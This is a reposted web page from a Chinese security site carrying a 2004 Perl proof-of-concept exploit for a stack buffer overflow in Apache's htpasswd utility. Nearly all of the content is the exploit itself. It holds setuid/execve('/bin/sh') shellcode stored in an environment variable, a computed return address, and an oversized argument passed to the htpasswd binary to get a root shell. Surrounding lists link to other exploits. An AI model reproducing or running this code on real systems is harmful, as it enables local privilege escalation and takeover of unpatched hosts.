首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Proof Of Concept exploit for htpasswd of Apache
来源:www.flowsecurity.org 作者:Luiz 发布时间:2004-09-22  

Proof Of Concept exploit for htpasswd of Apache

#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot@flowsecurity.org
$shellcode =
"\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);

print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";

local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;

exec("$target -nb $buffer");


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·finding hidden modules on 2.6
·Pigeon Server DoS Exploit
·Cdrecord Local Exploit (SUID S
·Sudo Local Exploit
·BlackJumboDog FTP Server Buffe
·Windows JPEG Processing Buffer
·Cdrecord Local Root Exploit
·Windows JPEG GDI+ Overflow She
·Citadel/UX<= 6.23 Remote US
·Windows JPEG GDI+ Overflow Adm
·Trillian 0.74i Remote Buffer O
·HP-UX本地语言系统格式化串漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved